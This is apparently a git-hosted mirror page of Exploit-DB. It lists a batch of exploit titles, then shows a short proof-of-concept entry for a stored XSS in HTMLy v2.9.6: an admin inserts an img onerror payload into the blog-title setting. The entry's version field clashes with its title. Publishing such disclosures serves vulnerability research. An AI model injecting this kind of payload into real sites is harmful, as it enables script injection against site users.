exploit-db-mirror/exploits/php/webapps/51979.txt at 094f6f9304e853dc52fa71f2cec8423ea3ccb3cd - bpmcdevitt/exploit-db-mirror - git_mcdevitt: Beyond coding. We Forge.

bpmcdevitt/exploit-db-mirror

Exploit-DB aa67db6cea DB: 2024-04-13

15 changes to exploits/shellcodes/ghdb

MinIO < 2024-01-31T20-20-33Z - Privilege Escalation

PrusaSlicer 2.6.1 - Arbitrary code execution

GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload

HTMLy Version v2.9.6 - Stored XSS

Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - _sort_ parameter

PopojiCMS Version 2.0.1 - Remote Command Execution

Quick CMS v6.7 en 2023 - 'password' SQLi

Service Provider Management System v1.0 - SQL Injection

WBCE 1.6.0 - Unauthenticated SQL injection

WBCE CMS Version 1.6.1 - Remote Command Execution (Authenticated)

Wordpress Plugin Playlist for Youtube 1.32 - Stored Cross-Site Scripting (XSS)

Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)

Ray OS v2.6.3 - Command Injection RCE(Unauthorized)

Terratec dmx_6fire USB - Unquoted Service Path

2024-04-13 00:16:27 +00:00

9 lines

No EOL

344 B

Text

Raw Blame History

 # Exploit Title: HTMLy Version v2.9.6 - Stored XSS
 # Exploit Author: tmrswrr
 # Vendor Homepage: https://www.htmly.com/
 # Version 3.10.8.21
 # Date : 04/08/2024
 ) Login admin https://127.0.0.1/HTMLy/admin/config
 ) General Setting > Blog title >  "><img src=x onerrora=confirm() onerror=confirm(1)>
 ) After save it you will be see XSS alert